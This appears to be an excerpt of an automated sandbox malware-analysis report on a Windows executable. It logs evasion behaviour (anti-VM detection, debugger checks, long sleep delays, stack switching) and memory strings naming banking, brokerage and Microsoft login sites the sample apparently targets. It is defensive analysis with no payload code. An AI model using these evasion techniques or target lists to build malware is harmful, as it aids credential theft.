Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 8SxJ9aYfJ1.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TwkYThKVQVaYn.exe PID: 3552, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\findstr.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\findstr.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\findstr.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\findstr.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\findstr.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\findstr.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\findstr.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Memory allocated: 25A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Memory allocated: 47B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Memory allocated: 77A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Memory allocated: 87A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Memory allocated: 8950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Memory allocated: 9950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Memory allocated: 26C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Memory allocated: 4880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Memory allocated: 7170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Memory allocated: 8170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Memory allocated: 8310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Memory allocated: 9310000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Code function: 10_2_0167096E rdtsc

10_2_0167096E

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5844	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4899	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Window / User API: threadDelayed 9840	Jump to behavior

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	API coverage: 0.7 %
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	API coverage: 0.3 %

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe TID: 3516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036	Thread sleep count: 5844 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2732	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 992	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5448	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1836	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2052	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe TID: 4136	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 3728	Thread sleep count: 130 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 3728	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 3728	Thread sleep count: 9840 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 3728	Thread sleep time: -19680000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe TID: 6944	Thread sleep time: -80000s >= -30000s
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe TID: 6944	Thread sleep count: 37 > 30
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe TID: 6944	Thread sleep time: -55500s >= -30000s
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe TID: 6944	Thread sleep count: 38 > 30
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe TID: 6944	Thread sleep time: -38000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: s822635O8R95.18.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: s822635O8R95.18.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: s822635O8R95.18.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: s822635O8R95.18.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: s822635O8R95.18.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware2
Source: s822635O8R95.18.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: s822635O8R95.18.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: s822635O8R95.18.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: s822635O8R95.18.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: sbJGUdSMCgtLQJ.exe, 00000017.00000002.4528782188.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: s822635O8R95.18.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: s822635O8R95.18.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552j
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552u
Source: s822635O8R95.18.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: findstr.exe, 00000012.00000002.4528334347.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2803054309.000002BD7DB8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: s822635O8R95.18.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: s822635O8R95.18.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: s822635O8R95.18.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: s822635O8R95.18.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: s822635O8R95.18.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552~
Source: s822635O8R95.18.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: s822635O8R95.18.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: s822635O8R95.18.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: s822635O8R95.18.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: s822635O8R95.18.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: s822635O8R95.18.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: omVMware20,11696487552\|
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ive Brokers - GDCDYNVMware20,11696487552p
Source: s822635O8R95.18.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: s822635O8R95.18.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: s822635O8R95.18.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: s822635O8R95.18.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: s822635O8R95.18.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: s822635O8R95.18.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pageVMware20,11696487552
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x.intuit.comVMware20,1162
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tportal.hdfcbank.comVMware20,11696487552
Source: findstr.exe, 00000012.00000002.4534379410.0000000007E02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: look.office.comVMware20,11696487552s
Source: s822635O8R95.18.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: s822635O8R95.18.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Code function: 10_2_0167096E rdtsc

10_2_0167096E

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Code function: 10_2_00417B33 LdrLoadDll,

10_2_00417B33

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C4144 mov eax, dword ptr fs:[00000030h]	10_2_016C4144
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C4144 mov eax, dword ptr fs:[00000030h]	10_2_016C4144
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C4144 mov ecx, dword ptr fs:[00000030h]	10_2_016C4144
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C4144 mov eax, dword ptr fs:[00000030h]	10_2_016C4144
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C4144 mov eax, dword ptr fs:[00000030h]	10_2_016C4144
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162C156 mov eax, dword ptr fs:[00000030h]	10_2_0162C156
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C8158 mov eax, dword ptr fs:[00000030h]	10_2_016C8158
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636154 mov eax, dword ptr fs:[00000030h]	10_2_01636154
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01636154 mov eax, dword ptr fs:[00000030h]	10_2_01636154
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01660124 mov eax, dword ptr fs:[00000030h]	10_2_01660124
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov eax, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov ecx, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov eax, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov eax, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov ecx, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov eax, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov eax, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov ecx, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov eax, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DE10E mov ecx, dword ptr fs:[00000030h]	10_2_016DE10E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DA118 mov ecx, dword ptr fs:[00000030h]	10_2_016DA118
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DA118 mov eax, dword ptr fs:[00000030h]	10_2_016DA118
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DA118 mov eax, dword ptr fs:[00000030h]	10_2_016DA118
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DA118 mov eax, dword ptr fs:[00000030h]	10_2_016DA118
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F0115 mov eax, dword ptr fs:[00000030h]	10_2_016F0115
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_017061E5 mov eax, dword ptr fs:[00000030h]	10_2_017061E5
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016601F8 mov eax, dword ptr fs:[00000030h]	10_2_016601F8
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F61C3 mov eax, dword ptr fs:[00000030h]	10_2_016F61C3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F61C3 mov eax, dword ptr fs:[00000030h]	10_2_016F61C3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE1D0 mov eax, dword ptr fs:[00000030h]	10_2_016AE1D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE1D0 mov eax, dword ptr fs:[00000030h]	10_2_016AE1D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE1D0 mov ecx, dword ptr fs:[00000030h]	10_2_016AE1D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE1D0 mov eax, dword ptr fs:[00000030h]	10_2_016AE1D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AE1D0 mov eax, dword ptr fs:[00000030h]	10_2_016AE1D0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01670185 mov eax, dword ptr fs:[00000030h]	10_2_01670185
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016EC188 mov eax, dword ptr fs:[00000030h]	10_2_016EC188
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016EC188 mov eax, dword ptr fs:[00000030h]	10_2_016EC188
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D4180 mov eax, dword ptr fs:[00000030h]	10_2_016D4180
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D4180 mov eax, dword ptr fs:[00000030h]	10_2_016D4180
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B019F mov eax, dword ptr fs:[00000030h]	10_2_016B019F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B019F mov eax, dword ptr fs:[00000030h]	10_2_016B019F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B019F mov eax, dword ptr fs:[00000030h]	10_2_016B019F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B019F mov eax, dword ptr fs:[00000030h]	10_2_016B019F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162A197 mov eax, dword ptr fs:[00000030h]	10_2_0162A197
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162A197 mov eax, dword ptr fs:[00000030h]	10_2_0162A197
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162A197 mov eax, dword ptr fs:[00000030h]	10_2_0162A197
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165C073 mov eax, dword ptr fs:[00000030h]	10_2_0165C073
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01632050 mov eax, dword ptr fs:[00000030h]	10_2_01632050
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B6050 mov eax, dword ptr fs:[00000030h]	10_2_016B6050
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162A020 mov eax, dword ptr fs:[00000030h]	10_2_0162A020
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162C020 mov eax, dword ptr fs:[00000030h]	10_2_0162C020
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C6030 mov eax, dword ptr fs:[00000030h]	10_2_016C6030
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B4000 mov ecx, dword ptr fs:[00000030h]	10_2_016B4000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000 mov eax, dword ptr fs:[00000030h]	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000 mov eax, dword ptr fs:[00000030h]	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000 mov eax, dword ptr fs:[00000030h]	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000 mov eax, dword ptr fs:[00000030h]	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000 mov eax, dword ptr fs:[00000030h]	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000 mov eax, dword ptr fs:[00000030h]	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000 mov eax, dword ptr fs:[00000030h]	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000 mov eax, dword ptr fs:[00000030h]	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164E016 mov eax, dword ptr fs:[00000030h]	10_2_0164E016
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164E016 mov eax, dword ptr fs:[00000030h]	10_2_0164E016
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164E016 mov eax, dword ptr fs:[00000030h]	10_2_0164E016
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164E016 mov eax, dword ptr fs:[00000030h]	10_2_0164E016
